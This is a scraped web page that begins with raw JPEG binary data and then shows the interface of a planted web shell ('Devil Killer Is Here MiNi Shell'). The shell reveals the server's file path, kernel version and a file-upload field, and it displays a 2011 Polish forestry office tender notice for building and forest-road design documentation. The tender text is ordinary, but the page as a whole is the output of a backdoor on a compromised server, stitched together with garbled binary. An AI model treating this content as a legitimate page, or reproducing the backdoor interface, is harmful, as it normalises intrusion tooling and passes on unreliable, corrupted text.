JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111021/347118-N-2011.html

<p class="kh_header"><b>Szubin: Wykonanie dokumentacji projektowo-kosztorysowej</b><br>
<b>Numer ogłoszenia: 347118 - 2011; data zamieszczenia: 21.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Szubin , ul. Szubin Wieś 52, 89-200 Szubin, woj. kujawsko-pomorskie, tel. 052 3910310, 3910324, faks 052 3910337.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://szubin.torun.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo-kosztorysowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na wykonaniu dokumentacji projektowo-kosztorysowej oraz specyfikacji technicznych dla nw. obiektów budowlanych. Zamawiający podzielił przedmiot zamówienia na 2 części.  
I. Część 1 zamówienia: wykonanie dokumentacji projektowo-kosztorysowej modernizacji budynków mieszkalnych  i gospodarczych.
Zamówienie obejmuje wykonanie dokumentacji dla następujących obiektów:
1. Remont budynek mieszkalnego leśniczówki Laskownica, położony w m. Laskownica 25, 89-240 Kcynia,  pow. użytkowa 143,09 m2, murowany, 2-kondygnacyjny z poddaszem   nieużytkowym, kryty dachówką  położony Laskownica , 89-240 Kcynia. Ogólny zakres robót obejmuje:
 - termomodernizacja budynku, remont elewacji,
-	remont wejścia do piwnicy - wykonanie zadaszenia, poszerzenie otworu, montaż drzwi zewnętrznych, naprawa schodów, izolacja murków),
-	wykonanie zsypu do piwnicy, wykonanie nawiewu do kotłowni,
-	częściowa wymiana stolarki okiennej i okien piwnicznych,
-	montaż stopni, ławy kominiarskiej, drabinek śniegowych,
-	wymiana parapetów zewnętrznych,
-	konserwacja ogrodzenia drewnianego, uzupełnienie części ogrodzenia,
-	przebudowa studzienek kanalizacyjnych,
-	utwardzenie nawierzchni kostką brukową - parking, chodniki,
-	wykonanie okładzin schodów zewnętrznych,
-	adaptacja pomieszczenia na łazienkę na parterze,
-	wymiana instalacji c. o., (rury, grzejniki),
-	remont podłóg na parterze - rozbiórka podłóg z desek, wykonanie izolacji i posadzek betonowych, montaż paneli podłogowych, płytek ceramicznych,
-	remont łazienek na parterze i piętrze - wymiana okładzin ceramicznych, wymiana armatury sanitarnej,
-	wymiana wewnętrznej stolarki drzwiowej,
-	remont ścian i sufitów - rozbiórka okładzin z paneli, boazerii,  itp, wykonanie gładzi gipsowych, malowanie, 
-	adaptacja części poddasza na pokój (sucha zabudowa).
-	docieplenie dachu wełną mineralną,
-	uzupełnienie tynków wewnętrznych w piwnicy, malowanie,

2. Remont budynku gospodarczego położonego w m. Kąpie 24, 89-210 Łabiszyn, murowany z poddaszem, kryty eternitem,  pow. zabudowy 177,10m2 Ogólny zakres robót obejmuje:
-	wymiana pokrycia dachowego, rynien, obróbek blacharskich,
-	wymiana stolarki okiennej i drzwiowej,
-	remont oraz konserwacja więźby dachowej,
-	remont stropu drewnianego,
-	naprawa ścian zewnętrznych i wewnętrznych, remont elewacji,
-	wymiana instalacji elektrycznej,
-	remont posadzek betonowych, 
 
3. Wykonanie robót remontowych w siedzibie nadleśnictwa, położonych w m. Szubin wieś 52, 89-200 Szubin.  
3.1  Modernizacja budynku gospodarczego, murowanego, parterowego,  stropodach kryty papą, pow. zabudowy 157,24m2. Ogólny zakres robót obejmuje:
-	remont pokrycia dachowego poprzez ułożenie papy termozgrzewalnej, 
-	wymiana rynien, obróbek blacharskich,
-	remont elewacji - naprawa tynków, malowanie,
-	wymiana drzwi garażowych oraz stolarki okiennej,
-	przebudowa elektrycznej tablicy rozdzielczej,
-	wymiana instalacji elektrycznej i oświetleniowej, 
-	wymiana instalacji wod-kan.,
-	remont tynków wewnętrznych, malowanie,
3.2 Remont garażu 2-stanowiskowego, murowanego, krytego blachodachówką, pow. zabudowy 45,54 m2.
      Ogólny zakres robót obejmuje:
-	wymiana drzwi garażowych,
-	wymiana rynien,
-	naprawa tynków zewnętrznych i wewnętrznych,  malowanie  
3.3  Projekt utwardzenia nawierzchni kostką betonową - ok. 700m2 wraz z projektem odprowadzenia wód opadowych,
3.4 Projekt rozbiórki następujących budynków:
-	budynek gospodarczy wraz z przybudówką i wiatą , konstrukcji drewnianej, kryty papą (część główna) , oraz eternitem (przybudówka i wiata), pow. zabudowy 170,87m2,
-	budynek gospodarczy murowany, kryty eternitem, pow. zabudowy 32,95m2.

4.  Modernizacja siedziby Leśnictwa Drogosław, położonej w m. Drogosław 1, 89-200 Szubin, 
4.1. Budynek mieszkalny - leśniczówka, murowany, z poddaszem użytkowym, kryty blachodachówką, pow.   użytkowa 153,70m2.  Ogólny zakres robót obejmuje:
-	wymiana wewnętrznej stolarki drzwiowej,
-	remont podłóg na parterze - rozbiórka podłóg z desek, wykonanie izolacji i posadzek betonowych, montaż paneli podłogowych, płytek ceramicznych,
-	wymiana instalacji c. o., (rury, grzejniki),
-	remont sufitów na parterze, wykonanie okładzin stropów z płyt GKB,
-	remont tynków wewnętrznych, wykonanie gładzi, malowanie,
-	wymiana płytek podłogowych w korytarzu,
-	remont drewnianych schodów wewnętrznych,
-	wymiana kabiny prysznicowej, 
-	częściowa wymiana wewnętrznej instalacji elektrycznej,
-	wymiana balustrad na tarasie,
-	konserwacja ogrodzenia drewnianego, uzupełnienie, wymiana bramy na rozsuwaną,
-	przebudowa studzienek kanalizacyjnych,
-	utwardzenie nawierzchni kostką brukową - parking, chodniki,
4.2 Remont budynku garażowego, murowanego, krytego papą, pow. zabudowy 51,99 m2. Ogólny zakres robót  obejmuje:  
-	wymiana wrót garażowych,
-	remont elewacji - uzupełnienie tynków, malowanie,
-	remont pokrycia dachowego poprzez pokrycie papą termozgrzewalną,
4.3 Remont budynku gospodarczego murowanego, z poddaszem użytkowym, krytego papą, pow. zabudowy           
88,81m2. Ogólny zakres robót obejmuje:
-	remont pokrycia dachowego poprzez pokrycie papą termozgrzewalną,
-	montaż rynien i rur spustowych, 
-	remont więźby dachowej - częściowa wymiana elementów, konserwacja,
-	wymiana stolarki okiennej i drzwiowej,
-	wymiana poszycia ścian zewnętrznych z desek na wysokości poddasza,
-	naprawa tynków zewnętrznych, malowanie,
4.4  Budowa wiaty na drewno, konstrukcji drewnianej, na płycie betonowej, krytej blachodachówką, pow.   
       użytkowa ok. 25-30m2.
4.4 Rozbiórki następujących budynków gospodarczych: 
-	stodoła konstrukcji drewnianej, kryta eternitem, pow. zabudowy 95,03m2,
-	magazyn konstrukcji murowanej, kryty papą, pow. zabudowy 39,21m2,
-	stodoła konstrukcji drewnianej, kryta eternitem, pow. zabudowy 70,40m2,
-	szopa drewniana, kryta papą, pow. zabudowy 28,50m2.
Podane  zakresy  zawierają ogólny rozmiar planowanych robót remontowych wg zamierzeń i wiedzy Zamawiającego. Zamawiający zastrzega możliwość dokonania zmian w podanych zakresach w trakcie opracowania dokumentacji. 

Wymagany zakres dokumentacji dla części 1 zamówienia:
-	projekty budowlano-wykonawcze w 4 egz. na powyższe zadania, opracowane we wszystkich niezbędnych branżach,
-	wykonanie specyfikacji technicznych wykonania i odbioru robót budowlanych w 2 egz. we wszystkich branżach,
-	opracowanie dokumentacji dotyczącej bezpieczeństwa i ochrony zdrowia,
-	wykonanie kosztorysów inwestorskich i przedmiarów robót,
-	uzyskanie wszelkich wymaganych przepisami niezbędnych uzgodnień i opinii dokumentacji,
-	uzgadnianie z zamawiającym rozwiązań projektowych,
-	uzyskanie prawomocnych decyzji o pozwoleniu na budowę, lub zgłoszenie wykonania robót,
-	przygotowanie wszelkich opracowań również w formie elektronicznej (format PDF).


II. Część 2 zamówienia: wykonanie dokumentacji projektowej  remontów dróg leśnych:
1. Droga pożarowa nr 24 i 25 w Leśnictwie Pszczółczyn, gmina Łabiszyn,  dł. łącznie 3,1km, szerokość jezdni 3,5m. Nawierzchnia drogi z  pozostałościami nawierzchni bitumicznej na podbudowie z kruszywa wapiennego, pobocza gruntowe, rowy chłonne. Ogólny zakres robót obejmuje:
-	remont nawierzchni tłuczniowej, uzupełnienie ubytków, wyprofilowanie.
-	powierzchniowe utrwalenie gresami i emulsją asfaltową,
-	odtworzenie poboczy gruntowych oraz rowów chłonnych,
-	zaprojektowanie mijanek oraz zjazdów na skrzyżowaniach
2.  Droga pożarowa nr 70 w Leśnictwach Ustronie i Studzienki, gmina Szubin,  dł. 9,30km. Na odcinku 6,2 km nawierzchnia z kruszywa wapiennego,  na odcinku 3,1km nawierzchnia z pozostałości masy bitumicznej na podbudowie z kruszywa wapiennego. Szerokość jezdni 3,5m, pobocza gruntowe, odcinkowo rowy chłonne. Ogólny zakres robót obejmuje:
-	remont nawierzchni tłuczniowej, uzupełnienie ubytków, wyprofilowanie,
-	 powierzchniowe utrwalenie gresami i emulsją asfaltową,
-	odtworzenie poboczy gruntowych oraz rowów chłonnych,
-	zaprojektowanie mijanek oraz zjazdów utwardzonych  na skrzyżowaniach-

3. Droga wywozowa w Leśnictwie Wieszki, gmina Szubin, dł.  3,0km. Droga o nawierzchni gruntowej, rowów brak, szerokość jezdni 3,5m. Ogólny zakres robót obejmuje:
-	karczowanie pni drzew oraz krzewów znajdujących sie w pasie drogi,
-	wykonanie oraz wyprofilowanie i zagęszczenie koryta,
-	wykonanie nawierzchni nieulepszonej z kruszywa,
-	wykonanie poboczy gruntowych,
-	wykonanie zjazdów utwardzonych na skrzyżowaniach.
4.  Droga wywozowa w Leśnictwie Glinki, gmina Sadki, dł.  1,47 km. Droga o nawierzchni gruntowej,  rowów brak, szerokość jezdni 3,5m. Ogólny zakres robót obejmuje:
-	karczowanie pni drzew oraz krzewów znajdujących sie w pasie drogi,
-	odcinkowo poszerzenie drogi biegnącej w wykopie, 
-	wykonanie oraz wyprofilowanie i zagęszczenie koryta,
-	wykonanie nawierzchni nieulepszonej z kruszywa,
-	wykonanie poboczy gruntowych,
-	wykonanie zjazdów utwardzonych na skrzyżowaniach.

5. Droga pożarowa nr 6 w Leśnictwach Jaktórka i Kowalewo, gmina Szubin,  dł. 2,64 km. Droga o nawierzchni gruntowej,  rowów brak, szerokość jezdni 3,5m. Ogólny zakres robót obejmuje:
-	karczowanie pni drzew oraz krzewów znajdujących sie w pasie drogi,
-	odcinkowo poszerzenie drogi biegnącej w wykopie, 
-	wykonanie oraz wyprofilowanie i zagęszczenie koryta,
-	wykonanie nawierzchni nieulepszonej z kruszywa,
-	wykonanie poboczy gruntowych,
-	wykonanie mijanek oraz  zjazdów utwardzonych na skrzyżowaniach.
6. Droga pożarowa nr 10 w Leśnictwach Gąbin i Łabiszyn , gmina Łabiszyn, dł. 5,177 km. Droga o nawierzchni wykonanej z kruszywa wapiennego, po remoncie w 2011r, szerokość jezdni 3,50m. Ogolny zakres robót obejmuje:
-	przygotowanie istniejącej nawierzchni z kruszywa wapiennego oraz powierzchniowe utrwalenie gresami i emulsją asfaltową

Podane  zakresy  zawierają ogólny rozmiar planowanych robót remontowych wg zamierzeń i wiedzy Zamawiającego. Zamawiający zastrzega możliwość dokonania zmian w podanych zakresach w trakcie opracowania dokumentacji. 

Wymagany zakres dokumentacji dla części 2 zamówienia:
-	projekty budowlano-wykonawcze w 4 egz. na powyższe zadania, opracowane we wszystkich niezbędnych branżach,
-	wykonanie specyfikacji technicznych wykonania i odbioru robót budowlanych w 2 egz. we wszystkich branżach,
-	wykonanie kosztorysów inwestorskich i przedmiarów robót,
-	uzyskanie wszelkich wymaganych przepisami niezbędnych uzgodnień i opinii dokumentacji,
-	uzgadnianie z zamawiającym rozwiązań projektowych,
-	przygotowanie wszelkich opracowań również w formie elektronicznej (format PDF)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.22.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)	Zamawiający wymaga wniesienia wadium dla poszczególnych części zamówienia w  wysokości:
a)	dla części 1 zamówienia - 1.000,00 zł (słownie złotych: jeden tysiąc),
b)	dla części 2 zamówienia - 1.500,00 zł (słownie złotych: jeden tysiąc pięćset złotych).
2)	Wadium może być wniesione w jednej lub kilku następujących formach:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej , z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r Nr 42, poz. 275) 
3)	Wadium w formie pieniężnej należy wnieść na rachunek bankowy zamawiającego: PKO BP o/Szubin  49 1020 1462 0000 7502 0157 0332  Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty.  
4)	Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości, należy złożyć w formie oryginału w kasie zamawiającego (w siedzibie zamawiającego). Natomiast do oferty należy załączyć potwierdzoną za zgodność z oryginałem kserokopię.
5)	Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.
6)	Wadium musi być wniesione przed upływem  terminu składania ofert. tj. do dnia 02.11.2011r. do godz. 9.00.
7)	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym zamawiającego.
8)	Wykonawca,  który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
9)	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została uznana jako najkorzystniejsza, z zastrzeżeniem ust. 11. 
10)	Zamawiający niezwłocznie dokona zwrotu wadium na wniosek wykonawcy:
a)	który wycofał ofertę przed upływem terminu składania ofert,
b)	który został wykluczony z postępowania,
c)	którego oferta została odrzucona.
11)	Wadium wykonawcy zostanie zatrzymane wraz z odsetkami w przypadku, gdy wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie (w przypadku jeżeli wadium zostało wniesione w pieniądzu),
12)	Wadium wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zostanie zatrzymane wraz z odsetkami w przypadku, gdy:
a)	odmówi podpisania umowy na warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie wykonawcy.
Wadium wniesione w pieniądzu, zamawiający przechowa na rachunku bankowym i zwróci je na rachunek bankowy wskazany przez wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-przedstawienie oświadczenia o spełnieniu warunków udziału w postępowaniu, określonych w art. 22 ust. 1
ustawy, 
- przedstawienie oświadczenia o braku podstaw do wykluczenia na podstawie art. 24 ust.1 ustawy
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie dokumentów i oświadczeń załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części 1 zamówienia: 
- wykazanie dysponowania co najmniej jedną osoba posiadającą uprawnienia do projektowania  w specjalności konstrukcyjno-budowlanej bez ograniczeń wydane zgodnie z § 17 rozporządzenia Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji technicznych w budownictwie z dnia 28.04.2006r. (Dz. U. Nr 83, poz. 578 ze zm.) lub odpowiadające im uprawnienia wydane na podstawie przepisów obowiązujących w chwili uzyskania stosownych uprawnień,
- przedstawienie oświadczenia, że osoba wskazana w wykazie jako projektant  posiada uprawnienia do projektowania  w specjalności konstrukcyjno-budowlanej bez ograniczeń,   wydane zgodnie z § 17 rozporządzenia Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji technicznych w budownictwie z dnia 28.04.2006r. (Dz. U. Nr 83, poz. 578 ze zm.) lub odpowiadające im uprawnienia wydane na podstawie przepisów obowiązujących w chwili uzyskania stosownych uprawnień

Dla części 2 zamówienia:
- wykazanie dysponowania co najmniej jedną osobą posiadającą uprawnienia do projektowania  w specjalności drogowej bez ograniczeń wydane zgodnie z § 17 rozporządzenia Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji technicznych w budownictwie z dnia 28.04.2006r. (Dz. U. Nr 83, poz. 578 ze zm.) lub odpowiadające im uprawnienia wydane na podstawie przepisów obowiązujących w chwili uzyskania stosownych uprawnień,
- przedstawienie oświadczenia, że osoba wskazana w wykazie jako projektant  posiada uprawnienia do projektowania  w specjalności drogowej bez ograniczeń,   wydane zgodnie z § 17 rozporządzenia Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji technicznych w budownictwie z dnia 28.04.2006r. (Dz. U. Nr 83, poz. 578 ze zm.) lub odpowiadające im uprawnienia wydane na podstawie przepisów obowiązujących w chwili uzyskania stosownych uprawnień 
cena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie dokumentów i oświadczeń załączonych do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający zastrzega możliwość dokonania zmian w podanych zakresach robót objętych  opracowaniem dokumentacji projektowo-kosztorysowej.
2.	Zmiana terminu realizacji może ulec zmianie w sytuacji:
